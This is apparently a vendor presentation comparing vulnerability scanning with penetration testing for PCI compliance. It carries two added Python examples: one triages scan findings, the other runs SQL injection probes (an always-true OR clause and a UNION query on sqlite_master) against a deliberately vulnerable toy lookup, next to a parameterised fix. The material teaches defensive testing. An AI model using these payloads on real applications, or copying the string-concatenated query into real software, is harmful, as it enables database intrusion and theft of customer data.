For more info on pen testing: securitymetrics.com/sm/pub/penetrationtesting
For more info on vulnerability scanning: securitymetrics.com/sm/pub/vulnerabilityscanning
Even the most experienced administrators may fail to implement the latest secure practices at your business. The easiest and most accurate way to discover whether your business is secure enough to withstand a hack is to test it through the eyes of a hacker. An ethical hacker is essentially a computer bodyguard who manually examines a business environment for weaknesses via a penetration test and determines which of those weaknesses can actually be exploited. Discover how penetration testers search for vulnerabilities using the latest hacking techniques, and learn how to batten down your organisational hatches with penetration testing and vulnerability scanning.
2. About Us
> Assisted >1 million merchants
> Largest PCI support staff worldwide
> Certified as ASV, PFI, QSA, PA-QSA
> Member of PCI Security Standards Council task forces and special interest groups
> Performs on-site auditing, forensic investigations, penetration testing, vulnerability scanning, security consulting, PCI compliance
> Offers network security devices, data discovery software
3. Testing Network Security
• 93% of large organisations and 76% of small businesses experienced a security breach in 2011 (Information Security Breaches Survey, 2012)
• Compromise costs
  – Financial penalties
  – Average organisational cost $5.5 million (Ponemon Institute, 2012)
  – Significant loss of reputation/brand trust
• Various ways to test network security
  – Vulnerability scan
  – Penetration test (scanning and penetration testing together are the most thorough; see slides 4 to 6)
  – Anti-virus/anti-malware software
  – Appliances (Intrusion Prevention Systems)
  – Anti-spyware software
4. Vulnerability Scan (VA scan)
An automated, high-level test
• Identifies network weaknesses and ranks how critical they are
• Gives a beginning look at what could possibly be exploited
• A good VA scan searches for over 50,000 known vulnerabilities
Process
• Should be conducted by a company with accreditation (e.g., a PCI SSC Approved Scanning Vendor)
• Automatic network scans on a quarterly basis
• Report of weaknesses (which will include some false positives)
• Weaknesses patched on a prioritised basis
Benefits
• Quick high-level look at possible vulnerabilities
• Very affordable
• Automatic
• Takes a matter of minutes
Limitations
• Sometimes the test falsely classifies something as a vulnerability (false positive)
• Each reported vulnerability must be checked manually before testing again
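The scan-then-triage loop this slide describes (rank by criticality, report, check false positives by hand, patch in priority order, rescan), as an added example that is not part of the original presentation. The CSV layout, the findings, the hosts (documentation address range) and the suppression list of hand-verified false positives are all constructed for the illustration. The one external rule it encodes is the PCI ASV Program Guide threshold: any finding with a CVSS base score of 4.0 or higher fails the scan unless it is a documented false positive, which is why the code refuses to suppress a finding whose false-positive claim has no evidence attached.

```python
"""Triage of an automated vulnerability-scan export.

Added example, not code from the original presentation. Everything
below is constructed: the CSV columns (Host, PluginID, CVSS, Name),
the sample findings, the IP addresses and the suppression list of
findings somebody has already verified by hand.
"""
import csv
import io
from dataclasses import dataclass

# PCI ASV Program Guide rule: a finding with a CVSS base score of 4.0 or
# higher makes the scan non-compliant, unless it is a documented false
# positive that the ASV has accepted.
ASV_FAIL_THRESHOLD = 4.0


@dataclass(frozen=True)
class Finding:
    host: str
    plugin_id: str
    cvss: float
    name: str


# Constructed scan export in the shape of a typical scanner CSV.
SCAN_EXPORT = """\
Host,PluginID,CVSS,Name
203.0.113.10,10001,9.8,Outdated OpenSSL with known remote code execution
203.0.113.10,10002,5.3,TLS 1.0 enabled
203.0.113.11,10003,7.5,SQL injection in /search parameter q
203.0.113.11,10004,3.1,Server version disclosed in banner
203.0.113.12,10002,5.3,TLS 1.0 enabled
"""

# (host, plugin_id) -> evidence from the manual check. An entry with no
# evidence is ignored on purpose: a suppression nobody can justify is
# how real vulnerabilities get hidden from the report.
VERIFIED_FALSE_POSITIVES = {
    ("203.0.113.12", "10002"): "TLS 1.0 handshake rejected; scanner matched a banner string",
    ("203.0.113.10", "10001"): "",  # claimed as a false positive, but nobody recorded why
}


def parse_export(text: str) -> list[Finding]:
    """Turn the CSV export into Finding records."""
    reader = csv.DictReader(io.StringIO(text))
    return [Finding(r["Host"], r["PluginID"], float(r["CVSS"]), r["Name"]) for r in reader]


def triage(findings, verified_fp):
    """Split findings into a ranked work list and the suppressed set.

    Returns (ranked, suppressed): ranked is ordered by CVSS descending so
    the patching order follows criticality; suppressed holds only findings
    whose false-positive claim carries evidence.
    """
    ranked, suppressed = [], []
    for f in findings:
        if verified_fp.get((f.host, f.plugin_id)):
            suppressed.append(f)
        else:
            ranked.append(f)
    ranked.sort(key=lambda f: (-f.cvss, f.host, f.plugin_id))
    return ranked, suppressed


def asv_compliant(ranked) -> bool:
    """True when nothing left on the work list reaches the ASV fail threshold."""
    return all(f.cvss < ASV_FAIL_THRESHOLD for f in ranked)


if __name__ == "__main__":
    ranked, suppressed = triage(parse_export(SCAN_EXPORT), VERIFIED_FALSE_POSITIVES)
    for f in ranked:
        print(f"{f.cvss:4.1f}  {f.host:<14} {f.name}")
    print("suppressed:", [(f.host, f.plugin_id) for f in suppressed])
    print("ASV compliant:", asv_compliant(ranked))
```

The unjustified suppression of plugin 10001 on 203.0.113.10 is deliberately not honoured, so the 9.8 finding stays at the top of the work list and the scan stays non-compliant until it is patched and rescanned; only the TLS finding that was actually disproved by a handshake test drops out.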
5. Penetration Test
An exhaustive, live examination
• Live attempt to exploit vulnerabilities
• Analyst takes on the "hacker" role
• Tries to guess passwords, manipulate code, and fool web servers into giving up sensitive information
Process
• Run an automatic vulnerability scan
• Follow up on reported vulnerabilities
• Prove the vulnerability can be exploited
• Internal and external testing
  – External: perspective of a hacker over the Internet
  – Internal: perspective of someone within the network
• Report findings and recommendations per target
Benefits
• More accurate and thorough than a VA scan
• Manual: a live analyst reviews the logic of the application and determines how to leverage access
• Rules out false positives
Limitations
• Time (1 day to 3 weeks)
• Cost
6. Comparison
Vulnerability Scan             Penetration Test
• Automated                    • Manual (main difference)
• Minutes                      • Days
• Scheduled (e.g., quarterly)  • Annually, and after any significant change
• Passive                      • Aggressive
• Reports false positives      • Rules out false positives
• Programmed                   • Intuitive
• Identical scans              • Accurate/thorough
• N/A                          • Exploitation
Both tests work together to encourage optimal network security
7. Conclusion
• Computer intrusion was responsible for 83% of the total reported exposed records in 2011 and one third of total breaches.
  – Data Breach Intelligence Report, 2012
"History has taught us: never underestimate the amount of money, time, and effort someone will expend to thwart a security system. It's always better to assume the worst… Give yourself a margin for error. Give yourself more security than you need today. When the unexpected happens, you'll be glad you did."
– Bruce Schneier: cryptographer, security expert
Editor's Notes
Presentation Description: What is expected of vendor's network security? How do you ensure your company is meeting essential security requirements? With payments security expert Gary Glover, attendees will explore the benefits, limitations, processes, and business relevancy of vulnerability scanning and penetration testing.
How do you figure out if you're safe? What is expected? If data is compromised, ignorance will not be an effective excuse. Even if you might not deal with critical data yourself, it is essential to check all environments. VA and penetration testing are the most thorough.
Cost: the average pen test is $5-10k and a vulnerability scan is only a couple hundred bucks. Another benefit: if you have a ton of networks set up exactly the same, you can just sample a few instead of paying to test them all (a VA scan is required to test them all).
Manual test: the main difference between VA scanning and pen testing. Ruling out false positives: an automated scan is only as good as the code; a pen tester can manually prove false positives. Thoroughness: all automated tools struggle with automation; a real person can completely review the target scope. Exploitation: if an analyst finds it, they can determine the inherent risk of the issue at that time. Most automated scans can't authenticate. They're from an external perspective, and are not usually given login credentials to authenticate and look in internal applications. Talk about how these two work together! They need both!
Network security testing is required for Payment Card Industry Data Security Standard compliance. Database exploitation: pen testers are able to obtain full credit card data, full customer contact info, trade secrets, and social security numbers within a matter of days. In 90% of cases where SQL injection is present, SecurityMetrics penetration testers can get inside the database.
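Slide 5's "prove the vulnerability can be exploited" step and the SQL injection note above, as an added example that is not from the original presentation. A scanner reports a query built from untrusted input; a tester confirms the finding by showing the input actually reaches the SQL parser, then uses the same flaw to enumerate the database. The customers table, its rows and the two lookup functions are constructed for this illustration (SQLite in memory, so it runs offline); the hardened function beside the vulnerable one is the fix a pen-test report would recommend.

```python
"""Proving a reported SQL injection instead of just reporting it.

Added example, not code from the original presentation. The customers
table, its three rows and both lookup functions are constructed for
this illustration; the attack strings are standard boolean and UNION
probes written for SQLite's syntax.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for the application's database (constructed data)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE customers (id INTEGER PRIMARY KEY, email TEXT, card_last4 TEXT)"
    )
    con.executemany(
        "INSERT INTO customers (email, card_last4) VALUES (?, ?)",
        [("alice@example.com", "4242"), ("bob@example.com", "0005"), ("carol@example.com", "1111")],
    )
    return con


def lookup_vulnerable(con, email):
    """What the scanner flags: untrusted input concatenated into the SQL text."""
    sql = f"SELECT email, card_last4 FROM customers WHERE email = '{email}'"
    return con.execute(sql).fetchall()


def lookup_hardened(con, email):
    """The fix: a parameterised query, so the input is only ever a value."""
    return con.execute(
        "SELECT email, card_last4 FROM customers WHERE email = ?", (email,)
    ).fetchall()


def prove_injection(lookup, con) -> bool:
    """Boolean-based confirmation a tester runs on a scanner finding.

    A value that matches no row is the baseline; the same value with an
    always-true clause appended returns rows only if the quote reached the
    SQL parser. A False result means the scanner finding was a false positive.
    """
    baseline = lookup(con, "nobody@example.invalid")
    probe = lookup(con, "nobody@example.invalid' OR '1'='1")
    return len(baseline) == 0 and len(probe) > 0


def enumerate_tables(lookup, con) -> list[str]:
    """Once proven, 'get inside the database': pull table names via UNION.

    SQLite keeps its catalogue in sqlite_master; selecting two columns
    matches the original SELECT so the UNION is accepted, and the trailing
    comment swallows the closing quote the application appends.
    """
    payload = "x' UNION SELECT name, sql FROM sqlite_master --"
    return [row[0] for row in lookup(con, payload)]


if __name__ == "__main__":
    con = build_db()
    for label, fn in (("vulnerable", lookup_vulnerable), ("hardened", lookup_hardened)):
        print(label, "injectable:", prove_injection(fn, con),
              "tables exposed:", enumerate_tables(fn, con))
```

Run against the hardened lookup, both probes return nothing: the quote and the UNION are just characters in a bound value, which is exactly the evidence a retest needs before the finding is closed. The boolean probe is the cheap check to rule out a scanner false positive; the UNION step is the part of the engagement that turns "the query is injectable" into "here is what an attacker can read", which is what the risk rating in the report should be based on.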